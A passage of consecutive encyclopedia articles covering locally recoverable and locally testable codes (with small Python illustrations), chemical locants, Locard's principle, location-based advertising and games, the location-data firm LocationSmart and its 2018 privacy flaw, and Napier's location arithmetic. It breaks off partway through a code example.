Next, let us define the encoding polynomial : f a ( x ) = ∑ i = 0 r − 1 f i ( x ) x i {\displaystyle f_{a}(x)=\sum _{i=0}^{r-1}f_{i}(x)x^{i}} , where f i ( x ) = ∑ j = 0 k r − 1 a i , j g ( x ) j {\displaystyle f_{i}(x)=\sum _{j=0}^{{\frac {k}{r}}-1}a_{i,j}g(x)^{j}} and g ( x ) = x 5 {\displaystyle g(x)=x^{5}} is the good polynomial chosen above. So, f a ( x ) = {\displaystyle f_{a}(x)=} a 0 , 0 + {\displaystyle a_{0,0}+} a 0 , 1 x 5 + {\displaystyle a_{0,1}x^{5}+} a 1 , 0 x + {\displaystyle a_{1,0}x+} a 1 , 1 x 6 + {\displaystyle a_{1,1}x^{6}+} a 2 , 0 x 2 + {\displaystyle a_{2,0}x^{2}+} a 2 , 1 x 7 + {\displaystyle a_{2,1}x^{7}+} a 3 , 0 x 3 + {\displaystyle a_{3,0}x^{3}+} a 3 , 1 x 8 {\displaystyle a_{3,1}x^{8}} .
Thus, we can use the obtained encoding polynomial if we take our data to encode as the row vector m = {\displaystyle m=} ( a 0 , 0 , a 0 , 1 , a 1 , 0 , a 1 , 1 , a 2 , 0 , a 2 , 1 , a 3 , 0 , a 3 , 1 ) {\displaystyle (a_{0,0},a_{0,1},a_{1,0},a_{1,1},a_{2,0},a_{2,1},a_{3,0},a_{3,1})} . The vector m {\displaystyle m} is then encoded into a codeword c {\displaystyle c} of length 15 by multiplying m {\displaystyle m} by the generator matrix of the code.
For example, the encoding of information vector m = ( 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 ) {\displaystyle m=(1,1,1,1,1,1,1,1)} gives the codeword c = m G = ( 8 , 8 , 5 , 9 , 21 , 3 , 36 , 31 , 32 , 12 , 2 , 20 , 37 , 33 , 21 ) {\displaystyle c=mG=(8,8,5,9,21,3,36,31,32,12,2,20,37,33,21)} .
Observe that we constructed an optimal LRC; therefore, using the Singleton bound , we have that the distance of this code is d = n − k − ⌈ k r ⌉ + 2 = 15 − 8 − 2 + 2 = 7 {\displaystyle d=n-k-\left\lceil {\frac {k}{r}}\right\rceil +2=15-8-2+2=7} . Thus, we can recover any 6 erasures from our codeword by looking at no more than 8 other components.
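The local-recovery step can be illustrated with a short sketch (not from the cited references). The ordering of the fifteen evaluation points, A_1 followed by 2·A_1 and 3·A_1, is an assumption, but the recovery of an erased symbol from the four other symbols of its locality set does not depend on it:

```python
# Encode the all-ones message with f_a(x) and recover an erased
# symbol inside a locality set by Lagrange interpolation over F_41.
q = 41
A1 = [1, 10, 16, 18, 37]
points = [(m * a) % q for m in (1, 2, 3) for a in A1]   # n = 15

def f(x):
    # f_a with all coefficients a_{i,j} = 1: exponents 0..3 and 5..8
    return sum(pow(x, e, q) for e in (0, 1, 2, 3, 5, 6, 7, 8)) % q

codeword = [f(x) for x in points]

# Erase the symbol at A1[0]. On A_1, x^5 is constant, so f restricted
# to A_1 is a cubic, determined by the four remaining points.
x0, xs = A1[0], A1[1:]
rec = 0
for i, xi in enumerate(xs):
    num = den = 1
    for j, xj in enumerate(xs):
        if i != j:
            num = num * (x0 - xj) % q
            den = den * (xi - xj) % q
    rec = (rec + f(xi) * num * pow(den, q - 2, q)) % q  # den^(q-2) = den^(-1)

print(rec == f(x0))  # True: locality-4 recovery succeeds
```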
A code C {\displaystyle C} has all-symbol locality r {\displaystyle r} and availability t {\displaystyle t} if every code symbol can be recovered from t {\displaystyle t} disjoint repair sets of other symbols, each set of size at most r {\displaystyle r} symbols. Such codes are called ( r , t ) a {\displaystyle (r,t)_{a}} -LRC. [ 10 ]
Theorem The minimum distance of [ n , k , d ] q {\displaystyle [n,k,d]_{q}} -LRC having locality r {\displaystyle r} and availability t {\displaystyle t} satisfies the upper bound
If the code is systematic and locality and availability apply only to its information symbols, then the code has information locality r {\displaystyle r} and availability t {\displaystyle t} , and is called ( r , t ) i {\displaystyle (r,t)_{i}} -LRC. [ 11 ]
Theorem [ 12 ] The minimum distance d {\displaystyle d} of an [ n , k , d ] q {\displaystyle [n,k,d]_{q}} linear ( r , t ) i {\displaystyle (r,t)_{i}} -LRC satisfies the upper bound | https://en.wikipedia.org/wiki/Locally_recoverable_code |
A locally testable code is a type of error-correcting code for which it can be determined if a string is a word in that code by looking at a small (frequently constant) number of bits of the string. In some situations, it is useful to know if the data is corrupted without decoding all of it so that appropriate action can be taken in response. For example, in communication, if the receiver encounters a corrupted code, it can request the data be re-sent, which could increase the accuracy of said data. Similarly, in data storage, these codes can allow for damaged data to be recovered and rewritten properly.
In contrast, locally decodable codes use a small number of bits of the codeword to probabilistically recover the original information. The fraction of errors determines how likely it is that the decoder correctly recovers the original bit; however, not all locally decodable codes are locally testable. [ 1 ]
Clearly, any valid codeword should be accepted as a codeword, but strings that are not codewords could be only one bit off, which would require many (certainly more than a constant number) probes. To account for this, testing failure is only defined if the string is off by at least a set fraction of its bits. This implies words of the code must be longer than the input strings by adding some redundancy.
To measure the distance between two strings, the Hamming distance is used: Δ ( u , v ) = | { i : u i ≠ v i } | {\displaystyle \Delta (u,v)=|\{i:u_{i}\neq v_{i}\}|} . The distance of a string w {\displaystyle w} from a code C : { 0 , 1 } k → { 0 , 1 } n {\displaystyle C:\{0,1\}^{k}\to \{0,1\}^{n}} is computed by Δ ( w , C ) = min x ∈ { 0 , 1 } k Δ ( w , C ( x ) ) {\displaystyle \Delta (w,C)=\min _{x\in \{0,1\}^{k}}\Delta (w,C(x))} . Relative distances are computed as a fraction of the number of bits: δ ( w , C ) = Δ ( w , C ) / n {\displaystyle \delta (w,C)=\Delta (w,C)/n} .
A code C : { 0 , 1 } k → { 0 , 1 } n {\displaystyle C:\{0,1\}^{k}\to \{0,1\}^{n}} is called q {\displaystyle q} -local δ {\displaystyle \delta } -testable if there exists a Turing machine M given random access to an input w {\displaystyle w} that makes at most q {\displaystyle q} non-adaptive queries of w {\displaystyle w} and satisfies the following: [ 2 ] if w {\displaystyle w} is a codeword of C {\displaystyle C} , then M accepts with probability 1; and if the relative distance of w {\displaystyle w} from C {\displaystyle C} is at least δ {\displaystyle \delta } , then M rejects with probability at least 1/2.
Also the rate of a code is the ratio between its message length and codeword length, k / n {\displaystyle k/n} .
It remains an open question whether there are any locally testable codes of linear size, but there are several constructions that are considered "nearly linear": [ 3 ]
These have both been achieved, even with constant query complexity and a binary alphabet , such as with n = k 1 + 1 / ( log k ) c {\displaystyle n=k^{1+1/(\log k)^{c}}} for any c ∈ ( 0 , 1 ) {\displaystyle c\in (0,1)} .
The next nearly linear goal is linear up to a polylogarithmic factor; n = poly ( log k ) ∗ k {\displaystyle n={\text{poly}}(\log k)*k} . No one has yet come up with a locally testable code that satisfies this constraint. [ 3 ]
In November 2021, two preprints reported [ 4 ] [ 5 ] [ 6 ] [ 7 ] the first polynomial-time construction of " c 3 {\displaystyle c^{3}} -LTCs", namely locally testable codes with constant rate r {\displaystyle r} , constant distance δ {\displaystyle \delta } and constant locality q {\displaystyle q} .
Locally testable codes have a lot in common with probabilistically checkable proofs (PCPs). This should be apparent from the similarities of their construction. In both, the verifier makes q {\displaystyle q} random nonadaptive queries into a large string; valid objects must be accepted with probability 1, and invalid ones must be accepted no more than half the time. The major difference is that PCPs are interested in accepting x {\displaystyle x} if there exists a w {\displaystyle w} so that M w ( x ) = 1 {\displaystyle M^{w}(x)=1} . Locally testable codes, on the other hand, accept w {\displaystyle w} if it is part of the code. Many things can go wrong in assuming a PCP proof encodes a locally testable code. For example, the PCP definition says nothing about invalid proofs, only invalid inputs.
Despite this difference, locally testable codes and PCPs are similar enough that frequently to construct one, a prover will construct the other along the way. [ 8 ]
One of the most famous error-correcting codes, the Hadamard code , is a locally testable code. A codeword x is encoded in the Hadamard code to be the linear function f ( y ) = ∑ i x i y i {\displaystyle f(y)={\sum _{i}{x_{i}y_{i}}}} (mod 2). This requires listing out the result of this function for every possible y, which requires exponentially more bits than its input. To test if a string w is a codeword of the Hadamard code, all we have to do is test if the function it encodes is linear. This means simply checking if w ( x ) ⊕ w ( y ) = w ( x ⊕ y ) {\displaystyle w(x)\oplus w(y)=w(x\oplus y)} for x and y uniformly random vectors (where ⊕ {\displaystyle \oplus } denotes bitwise XOR ).
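A minimal sketch of this linearity test (the code below is illustrative; the function names are assumptions, and messages and query points are packed as integers):

```python
# BLR linearity test for the Hadamard code: the codeword of message m
# lists <m, y> mod 2 for every y in {0,1}^k.
import random

k = 4
n = 1 << k  # codeword length 2^k

def hadamard_encode(m):
    # bit at position y is the GF(2) inner product of m and y
    return [bin(m & y).count("1") % 2 for y in range(n)]

def blr_test(w, trials=200):
    for _ in range(trials):
        x, y = random.randrange(n), random.randrange(n)
        if w[x] ^ w[y] != w[x ^ y]:
            return False  # a witnessed violation of linearity
    return True

w = hadamard_encode(0b1011)
print(blr_test(w))   # True: valid codewords always pass
w[3] ^= 1            # corrupt one position
print(blr_test(w))   # almost surely False: each trial catches the
                     # corruption with constant probability
```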
It is easy to see that for any valid encoding w {\displaystyle w} , this equation is true, as that is the definition of a linear function. Somewhat harder, however, is showing that a string that is δ {\displaystyle \delta } -far from C will have an upper bound on its error in terms of δ {\displaystyle \delta } . One bound is found by the direct approach of approximating the chances of exactly one of the three probes yielding an incorrect result. Let A, B, and C be the events of w ( x ) {\displaystyle w(x)} , w ( y ) {\displaystyle w(y)} , and w ( x ⊕ y ) {\displaystyle w(x\oplus y)} being incorrect. Let E be the event of exactly one of these occurring. This comes out to P ( E ) ≥ 3 δ ( 1 − 2 δ ) = 3 δ − 6 δ 2 {\displaystyle P(E)\geq 3\delta (1-2\delta )=3\delta -6\delta ^{2}} .
This works for 0 < δ ≤ 5 / 16 {\displaystyle 0<\delta \leq 5/16} , but shortly after, 3 δ − 6 δ 2 < δ {\displaystyle 3\delta -6\delta ^{2}<\delta } . With additional work, it can be shown that the error is bounded by
For any given δ {\displaystyle \delta } , this only has a constant chance of false positives, so we can simply check a constant number of times to get the probability below 1/2. [ 3 ]
The Long code is another code with very large blowup which is close to locally testable. Given an input 0 ≤ i < 2 k {\displaystyle 0\leq i<2^{k}} (note, this takes k {\displaystyle k} bits to represent), the function that returns the i {\displaystyle i} -th bit of the input, f i ( x ) = x i {\displaystyle f_{i}(x)=x_{i}} , is evaluated on all possible 2 k {\displaystyle 2^{k}} -bit inputs 0 ≤ x < 2 2 k {\displaystyle 0\leq x<2^{2^{k}}} , and the codeword is the concatenation of these (of length n = 2 2 k {\displaystyle n=2^{2^{k}}} ). The way to locally test this with some errors is to pick a uniformly random input x {\displaystyle x} and set y = x {\displaystyle y=x} , but with a small chance of flipping each bit, μ > 0 {\displaystyle \mu >0} . Accept a function f {\displaystyle f} as a codeword if f ( x ) = f ( y ) {\displaystyle f(x)=f(y)} . If f {\displaystyle f} is a codeword, this will accept f {\displaystyle f} as long as x i {\displaystyle x_{i}} was unchanged, which happens with probability 1 − μ {\displaystyle 1-\mu } . This violates the requirement that codewords are always accepted, but may be good enough for some needs. [ 9 ]
Other locally testable codes include Reed-Muller codes (see locally decodable codes for a decoding algorithm), Reed-Solomon codes , and the short code. | https://en.wikipedia.org/wiki/Locally_testable_code |
In the nomenclature of organic chemistry , a locant is a term to indicate the position of a functional group or substituent within a molecule . [ 1 ]
The International Union of Pure and Applied Chemistry (IUPAC) recommends the use of numeric prefixes to indicate the position of substituents, generally by identifying the parent hydrocarbon chain and assigning the carbon atoms based on their substituents in order of precedence . For example, there are at least two isomers of the linear form of pentanone , a ketone that contains a chain of exactly five carbon atoms. There is an oxygen atom bonded to one of the middle three carbons (if it were bonded to an end carbon, the molecule would be an aldehyde , not a ketone), but it is not clear where it is located.
In this example, the carbon atoms are numbered from one to five, which starts at one end and proceeds sequentially along the chain. Now the position of the oxygen atom can be defined as on carbon atom number two, three or four. However, atoms two and four are exactly equivalent, which can be shown by turning the molecule around by 180 degrees.
The locant is the number of the carbon atom to which the oxygen atom is bonded. If the oxygen is bonded to the middle carbon, the locant is 3. If the oxygen is bonded to an atom on either side (adjacent to an end carbon), the locant is 2 or 4; given the choice here, where the carbons are exactly equivalent, the lower number is always chosen. So the locant is either 2 or 3 in this molecule.
The locant is incorporated into the name of the molecule to remove ambiguity. Thus the molecule is named either pentan-2-one or pentan-3-one , depending on the position of the oxygen atom.
A side chain can likewise take the place of the oxygen in this example; its locant is simply the number of the carbon atom to which anything other than a hydrogen is attached.
Another common system uses Greek letter prefixes as locants, which is useful in identifying the relative location of carbon atoms as well as hydrogen atoms to other functional groups.
The α-carbon ( alpha -carbon) refers to the first carbon atom that attaches to a functional group , such as a carbonyl . The second carbon atom is called the β-carbon ( beta -carbon), the third is the γ-carbon ( gamma -carbon), and the naming system continues in alphabetical order. [ 2 ]
The nomenclature can also be applied to the hydrogen atoms attached to the carbon atoms. A hydrogen atom attached to an α-carbon is called an α-hydrogen , a hydrogen atom on the β-carbon is a β-hydrogen , and so on.
Organic molecules with more than one functional group can be a source of confusion. Generally the functional group responsible for the name or type of the molecule is the 'reference' group for purposes of carbon-atom naming. For example, the molecules nitrostyrene and phenethylamine are quite similar; the former can even be reduced into the latter. However, nitrostyrene's α-carbon atom is adjacent to the phenyl group; in phenethylamine this same carbon atom is the β-carbon atom, as phenethylamine (being an amine rather than a styrene) counts its atoms from the opposite "end" of the molecule. [ 3 ]
In proteins and amino acids , the α-carbon is the backbone carbon before the carbonyl carbon atom in the molecule. Therefore, reading along the backbone of a typical protein would give a sequence of –[N—Cα—carbonyl C] n – etc. (when reading in the N to C direction). The α-carbon is where the different substituents attach to each different amino acid. That is, the groups hanging off the chain at the α-carbon are what give amino acids their diversity. These groups give the α-carbon its stereogenic properties for every amino acid except for glycine . Therefore, the α-carbon is a stereocenter for every amino acid except glycine. Glycine also does not have a β-carbon, while every other amino acid does.
The α-carbon of an amino acid is significant in protein folding . When describing a protein, which is a chain of amino acids, one often approximates the location of each amino acid as the location of its α-carbon. In general, α-carbons of adjacent amino acids in a protein are about 3.8 ångströms (380 picometers ) apart.
The α-carbon is important for enol - and enolate -based carbonyl chemistry as well. Chemical transformations affected by the conversion to either an enolate or an enol, in general, lead to the α-carbon acting as a nucleophile , becoming, for example, alkylated in the presence of primary haloalkane . An exception is in reaction with silyl chlorides , bromides , and iodides , where the oxygen acts as the nucleophile to produce silyl enol ether . | https://en.wikipedia.org/wiki/Locant |
In forensic science , Locard's principle holds that the perpetrator of a crime will bring something into the crime scene and leave with something from it, and that both can be used as forensic evidence . Dr. Edmond Locard (1877–1966) was a pioneer in forensic science who became known as the Sherlock Holmes of Lyon, France. [ 1 ] He formulated the basic principle of forensic science as: "Every contact leaves a trace". It is generally understood as "with contact between two items, there will be an exchange." Paul L. Kirk [ 2 ] expressed the principle as follows:
Wherever he steps, whatever he touches, whatever he leaves, even unconsciously, will serve as a silent witness against him. Not only his fingerprints or his footprints, but his hair, the fibres from his clothes, the glass he breaks, the tool mark he leaves, the paint he scratches, the blood or semen he deposits or collects. All of these and more, bear mute witness against him. This is evidence that does not forget. It is not confused by the excitement of the moment. It is not absent because human witnesses are. It is factual evidence. Physical evidence cannot be wrong, it cannot perjure itself, it cannot be wholly absent. Only human failure to find it, study and understand it, can diminish its value.
Fragmentary or trace evidence is any type of material left at (or taken from) a crime scene, or the result of contact between two surfaces, such as shoes and the floor covering or soil, or fibres from where someone sat on an upholstered chair.
When a crime is committed, fragmentary (or trace) evidence needs to be collected from the scene. A team of specialised police technicians goes to the scene of the crime and seals it off. They record video and take photographs of the crime scene, victim/s (if there are any) and items of evidence. If necessary, they undertake ballistics examinations. They check for foot, shoe, and tire mark impressions, plus hair as well as examine any vehicles and check for fingerprints – whole or partial.
Locard's principle also holds in computer forensics, where committing a cybercrime will result in a digital trace being left behind. [ 3 ]
In season 3, episode 15 of Father Brown , Inspector Sullivan and Frank Albert discuss this principle, which plays into the investigation.
In season 1, episode 10 of Sister Boniface Mysteries , the title character imagines Locard appearing to expound on his principle.
In season 2, episode 21 of Law & Order: Special Victims Unit , Locard's principle is mentioned and used in the investigation into a serial killer.
In season 9, episode 5 of Death in Paradise , DI Neville Parker uses Locard's principle to solve a murder disguised as a suicide. | https://en.wikipedia.org/wiki/Locard's_exchange_principle |
Location-based advertising ( LBA ) is a form of advertising that integrates mobile advertising with location-based services . The technology is used to pinpoint consumers' locations and provide location-specific advertisements on their mobile devices .
According to Bruner and Kumar, "LBA refers to marketer -controlled information specially tailored for the place where users access an advertising medium ". [ 1 ]
There are two types of location-based services in general: push and pull.
The push approach is more versatile and is divided into two types. An unrequested ( opt-out ) service is the more common of the two, as it allows advertisers to target users until the users ask for the ads to stop. By contrast, with the opt-in approach the users determine what type of advertisements or promotional material they receive from the advertisers. The advertisers must abide by certain legal regulations set in place and respect users' choices.
In contrast, using the LBA pull approach, users can directly search for information by entering certain keywords . The users look for specific information and not the other way around. For example, a traveler visiting New York could use a local search application such as WHERE on her device to find the nearest local Chinese restaurant in Manhattan. After she selects one of the restaurants, a map is provided as well as an offer of a free appetizer good for the next hour. [ 2 ]
Location-based advertising is closely related to mobile advertising, [ 3 ] which is divided into four types: [ clarification needed ]
For push-based LBA, users must opt-into the company's LBA program; this would most likely be done via the seller's website or at the store. Then users would be requested to provide their personal information, such as mobile phone number, first name, and other related information. After the data are all submitted, the company would send a text message requesting users to confirm the LBA subscription. Once these steps have been completed, the company can now use location-based technology to provide their customers with geographically based offers and incentives.
For pull-based LBA, users interact with local, typically mobile, sites or applications, and are presented offers in a standard pull advertising model. Location-based advertising companies like go2 Media aggregate local listings from yellow page companies, local directories, group discount businesses and others. Users are presented these ads as display advertising integrated with publisher content or search advertising in response to user queries.
In addition to directly opting in, users may see location-based display ads served from a location-based ad aggregator/network such as NAVTEQ or AdLocal by Cirius Technologies. [ 4 ]
LBA, as a form of direct marketing , allows marketers to reach specific target audiences. Bruner and Kumar state that LBA enhances the ability to reach people in a much more targeted manner than was possible in the past. [ 5 ] For example, if a customer has purchased a Harry Potter movie from a DVD/CD rental store and subscribed to the store's LBA program, he can expect to receive a message on his mobile phone about the release date of the next Harry Potter movie, including a movie sample, while he is on the train going back home.
Since LBA can improve advertising relevance by giving the customer control over what, when, where, and how they receive ads, it provides them with more relevant information, personalized message, and targeted offer. Vidaille (2007) stated, “With a targeted message, we’ve reached about 20 percent response rate. That’s incredibly good”. [ 6 ] The internet can do similar things, such as sending new information about products, promotional coupons , or asking consumers' opinion, but few people respond to e-mail marketing because it’s not personal anymore. In contrast, LBA gives consumers relevant information rather than spam; therefore, it increases the chances of getting higher responses.
Finally, unlike other traditional media , LBA, in addition to being used as advertising, can also be used to research consumers [ clarification needed ] which can be used to tailor future offers. [ 7 ] “Consumers are constantly providing information on their behavior through mobile internet activity”. [ 8 ] With location-based service, surveys can take place in the real world, in real time, rather than in halls, in a focus group facility, or on a PC. Mobile survey can be integrated with a marketing campaign; the results of customer satisfaction research can be used iteratively to guide the next campaign. For example, a restaurant that is experiencing increased competition can use the specific database – a collection of small mobile surveys of customers who had used coupons from the LBA in the geographic area – to determine their dining preferences, times, and occasions. Marketers can also use customers' past consumption patterns to forecast future patterns and send special dining offers to the target population at the right place and time, in order to build interest, response, and interaction to the restaurant.
The mobile phone is an incredibly personal tool. However, as Darling pointed out, “The fact that mobile device is so personal can be both a strength and a weakness”. [ 9 ] On one hand, marketers can entertain, inform, build brand awareness, create loyalty, and drive purchase decision among their target consumers through LBA. On the other hand, consumer privacy is still a concern. [ 10 ] Therefore, the establishment of a well thought-out consumer privacy and preference management policy is critical to the long-term success of LBA. Marketers should inform their consumers on how their information is to be stored, secured, and used or combined with other purposes of marketing. If LBA can assist people in their everyday life, they will be more than happy to reveal their location. To conclude, in order to ensure continue success and long-term longevity of LBA, consumer trust must be established and maintained. LBA needs to be permission-based and marketers must take great strides in protecting customers' privacy and respecting their preferences. In International Journal of Mobile Marketing , Banerjee and Dholakia found that the response to LBA depends not only on the type of location but also the kind of activity the individual is engaged in. [ 11 ] They are more likely to prefer LBA in public places and during leisure time.
Another major concern for LBA is spam ; consumers can easily perceive LBA as spam if it is done inappropriately. According to Fuller, spam is defined as “any unsolicited marketing message sent via electronic mail or to a mobile phone”. [ 12 ] In short, spam is an unwanted message that is delivered even though a user has not requested it. Since the customer is in control and all activities are voluntary, customers' objectives, goals, and emotions must be taken into account. A recent [ when? ] survey showed that users spend only 8 to 10 seconds on mobile advertisements. [ 13 ] Therefore, the interaction must be straightforward and simple. Marketers must also develop relevant and engaging advertising content that mobile users want to access at the right place and time. More importantly, marketers must make sure that their offer contains real value for the customer, and must follow strict opt-in policies. The best way for marketers to distance themselves from spam is to give consumers choice, control, and confidentiality while ensuring that they only receive relevant information.
Misuse of LBA can result in claims for a product or service that the advertiser cannot substantiate. Advertisements and advertorials that incorporate the geographical location of the customer have the potential to breach advertising rules, standards and codes of conduct in many jurisdictions. For instance, the UK Advertising Standards Authority (ASA) requires all advertisements to be honest, truthful and not mislead. [ citation needed ] Since the promoter will not know the final wording of the advertisement in every case, it cannot undergo a proper compliance check. A claim such as "[location] woman loses 10 pounds with our new diet plan" is clearly false, since it cannot be substantiated for the majority of geographies where the advertisement might appear. Claims based on LBA have been ruled misleading by the ASA on a case-by-case basis. [ 14 ]
A location-based game (also called location-enabled game , geolocation-based game , or simply geo game ) is a type of game in which the gameplay evolves and progresses via a player's real world location. Location-based games must provide some mechanism to allow the player to report their location, usually with GPS . Many location-based video games are video games that run on a mobile phone , using its GPS capability.
“Urban games” or “street games” are typically multiplayer location-based games played using city streets and built up urban environments. Various mobile devices can be used to play location-based games. These games have been referred to as “location-based mobile games,” [ 1 ] merging the concept of location-based games and mobile games .
Location-based games can be digital or physical in nature. For example, Geocaching is an outdoor recreational activity in which participants use a Global Positioning System (GPS) receiver or mobile device and other navigational techniques to hide and seek containers. In contrast, games such as Pokémon Go are fully contained in digital devices with very little to no interaction with or effect on the physical world.
Some location-based games that are video games have used embedded mobile technologies such as near field communication , Bluetooth and UWB . Such video games have also commonly used augmented reality to create an immersive experience. Games such as Pokémon Go and Ingress also use an Image Linked Map (ILM) interface, where approved geotagged locations appear on a stylized map generated based on GPS data for the user to interact with. [ 2 ]
Early location-based video games typically used SMS as a medium and located players using cellular network 's control plane locating requiring no additional capabilities from the user's device. [ 3 ]
Location-based games may induce learning, with researchers having observed that these activities produce learning that is social, experiential and situated. [ 4 ] It supports learning in Geography and other subjects including environmental education . Learning, however, is related to the objectives of the game designers. In a survey of location-based games, (Avouris & Yiannoutsou, 2012) [ 5 ] it was observed that in terms of the main objective, these games may be categorized as ludic (e.g., games that are created for fun), pedagogic, (e.g., games created mainly for learning), and hybrid, (e.g., games with mixed objectives). The ludic group, are to a large extent action oriented, involving either shooting, action or treasure hunt type of activities. These are weakly related to a narrative and a virtual world.
The role-playing version of these games have a higher learning potential, which has been confirmed by studies on students using location based games for learning. [ 6 ] On the other hand, the social interaction that takes place and skills related to strategic decisions, observation, planning and physical activity are the main characteristics of this strand in terms of learning. The pedagogic group of games involve participatory simulators, situated language learning and educational action games. Finally, the hybrid games are mostly museum location-based games and mobile fiction, or city fiction.
In a paper titled "Death by Pokémon GO ", researchers at Purdue University ’s Krannert School of Management claim the game caused "a disproportionate increase in vehicular crashes and associated vehicular damage, personal injuries, and fatalities in the vicinity of locations, called PokéStops, where users can play the game while driving." [ 7 ] Using data from one municipality, the paper extrapolates what that might mean nationwide and concluded "the increase in crashes attributable to the introduction of Pokémon GO is 145,632 with an associated increase in the number of injuries of 29,370 and an associated increase in the number of fatalities of 256 over the period of 6 July 2016, through 30 November 2016." The authors extrapolated the cost of those crashes and fatalities at between $2 billion and $7.3bn for the same period.
The nature of location-based gaming may mean that certain real-world locations will be visited by higher-than-normal numbers of people who are playing the game, which generally has been received favorably by nearby attractions or local businesses. However, these games may generate activity at locations that are privately-owned or have access limits, or otherwise cause undesirable congestion.
Pokémon Go notably has several publicized events of players being drawn to inappropriate locations for the game, requiring the developer to manually remove these areas from the game. [ 8 ] [ 9 ] [ 10 ] In one of the first legal challenges for location-based gaming, a Federal District court ruled that a Wisconsin county ordinance to require game developers of such location-based games to get appropriate permits to allow locations in the county's public park systems was likely unconstitutional. While the county had felt there was no First Amendment rights involved due to how locations were generated in-game, the Federal judge disagreed. [ 11 ]
The interaction of location-bound games with property law is largely undefined. [ 12 ] [ 13 ] Several models have been analysed for how this interaction may be resolved in a common law context: an extension of real property rights to also cover augmentations on or near the property with a strong notion of trespassing , forbidding augmentations unless allowed by the owner; an ' open range ' system, where augmentations are allowed unless forbidden by the owner; and a ' freedom to roam ' system, where real property owners have no control over non-disruptive augmentations. [ 14 ]
One issue experienced during the Pokémon Go craze was the game's players disturbing owners of private property while visiting nearby location-bound augmentations. The terms of service of Pokémon Go explicitly disclaim responsibility for players' actions, which may limit (but may not totally extinguish) the liability of its producer, Niantic , in the event of a player trespassing while playing the game: by Niantic's argument, the player is the one committing the trespass, while Niantic has merely engaged in permissible free speech . A theory advanced in lawsuits brought against Niantic is that their placement of game elements in places that will lead to trespass or an exceptionally large flux of visitors can constitute nuisance , despite each individual trespass or visit only being tenuously caused by Niantic. [ 15 ] [ 16 ] [ 17 ]
Another claim raised against Niantic is that the placement of profitable game elements on land without permission of the land's owners is unjust enrichment . [ 18 ] More hypothetically, a property may be augmented with advertising or disagreeable content against its owner's wishes. [ 19 ] Under American law, these situations are unlikely to be seen as a violation of real property rights by courts without an expansion of those rights to include augmented reality (similarly to how English common law came to recognise air rights ). [ 18 ]
Some attempts at legislative regulation have been made in the United States. Milwaukee County, Wisconsin , attempted to regulate location-based games played in its parks, requiring prior issuance of a permit, [ 20 ] but this was criticised on free speech grounds by a federal judge; [ 21 ] and Illinois considered mandating a notice and take down procedure for location-bound augmentations. [ 22 ]
Japan is the world's biggest market for consumer spending on location-based titles like Pokémon Go and Dragon Quest Walk , having generated over $620 million in 2023 which is equal to 50% of the global revenue. [ 23 ] By comparison, the United States is the second largest market for this genre spending over $380 million on the top five games. South Korea's spending on its top five came in at less than $16 million. [ 24 ] | https://en.wikipedia.org/wiki/Location-based_game |
LocationSmart , originally called TechnoCom Location Platform , is a location-as-a-service (LaaS) company based in Carlsbad, California , that provides location APIs to enterprises and operates a secure, cloud-based and privacy-protected platform. In February 2015, it acquired a competitor, Locaid. [ 1 ] [ 2 ]
LocationSmart provides near real-time location data for devices including smartphones, feature phones, tablets, M2M, IoT and other connected devices on Tier 1 and Tier 2 wireless networks in the U.S. and Canada. This includes AT&T , [ 3 ] Verizon Wireless , [ 4 ] T-Mobile US , Sprint Corporation , [ 5 ] MetroPCS , U.S. Cellular , Rogers Communications , Bell Canada and Telus . [ 6 ]
Founded in 1995, TechnoCom Corporation was headquartered in Los Angeles and called one of the area's fastest growing companies in 2003 by Deloitte & Touche . [ 7 ] In 2012, the TechnoCom Location Platform was rebranded as LocationSmart. [ 8 ]
On May 17, 2018, media outlets reported that the LocationSmart website allowed anyone to obtain the realtime location of any cell phone using any of the major U.S. wireless carriers (including AT&T, Verizon, T-Mobile, and Sprint), as well as some Canadian carriers, to within a few hundred yards, given only the phone number. [ 9 ] Approximately 200 million customers may have been exposed. No consent was required, and there was no ability to opt-out. In addition, the data could be requested by anyone anonymously, with no authentication , authorization , or payment required. [ 10 ] Security researcher Robert Xiao, who discovered the vulnerability, stated that the LocationSmart API failed to implement basic checks and that the vulnerability could have been found by anyone with little effort. In response, LocationSmart took the vulnerable service offline and claimed the company "takes privacy seriously". [ 11 ]
LocationSmart uses a variety of location methods that include cellular network location, Wi-Fi location, IP address location, landline location, hybrid location via a software development kit (SDK), browser location and global site identification (GSID) location.
LocationSmart provides location services for enterprises and Fortune 500 companies. LocationSmart is also used by US states to offer online gaming within the state borders. [ 12 ]
LocationSmart is a member of CTIA , the Transportation Intermediaries Association (TIA), and the International Association of Privacy Professionals (IAPP). | https://en.wikipedia.org/wiki/LocationSmart |
Location arithmetic (Latin arithmetica localis ) is an additive (non-positional) binary numeral system, which John Napier explored as a computation technique in his treatise Rabdology (1617), both symbolically and on a chessboard -like grid.
Napier's terminology, derived from using the positions of counters on the board to represent numbers, is potentially misleading, because the numbering system is, in fact, non-positional in current vocabulary.
During Napier's time, most of the computations were made on boards with tally-marks or jetons . So, unlike how it may be seen by the modern reader, his goal was not to use moves of counters on a board to multiply, divide and find square roots, but rather to find a way to compute symbolically with pen and paper.
However, when reproduced on the board, this new technique did not require mental trial-and-error computations nor complex carry memorization (unlike base 10 computations). He was so pleased by his discovery that he said in his preface:
it might be well described as more of a lark than a labor, for it carries out addition, subtraction, multiplication, division and the extraction of square roots purely by moving counters from place to place. [1]
Binary notation had not yet been standardized, so Napier used what he called location numerals to represent binary numbers. Napier's system uses sign-value notation to represent numbers; it uses successive letters from the Latin alphabet to represent successive powers of two: a = 2 0 = 1, b = 2 1 = 2, c = 2 2 = 4, d = 2 3 = 8, e = 2 4 = 16 and so on.
To represent a given number as a location numeral, that number is expressed as a sum of powers of two and then each power of two is replaced by its corresponding digit (letter). For example, when converting from a decimal numeral: 87 = 1 + 2 + 4 + 16 + 64 = abceg .
Using the reverse process, a location numeral can be converted to another numeral system. For example, when converting to a decimal numeral: abceg = 1 + 2 + 4 + 16 + 64 = 87.
Napier showed multiple methods of converting numbers in and out of his numeral system. These methods are similar to modern methods of converting numbers in and out of the binary numeral system , so they are not shown here. Napier also showed how to add, subtract, multiply, divide, and extract square roots.
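For concreteness, here is a small sketch of such conversions (illustrative modern code, not Napier's own procedure; the function names are assumptions):

```python
# Conversions between integers and location numerals, with
# a = 2^0, b = 2^1, c = 2^2, ...
from string import ascii_lowercase

def to_location(n):
    # one letter per set bit of n, i.e. the abbreviated form
    return "".join(ascii_lowercase[i]
                   for i in range(n.bit_length()) if (n >> i) & 1)

def from_location(s):
    # digits may repeat and appear in any order
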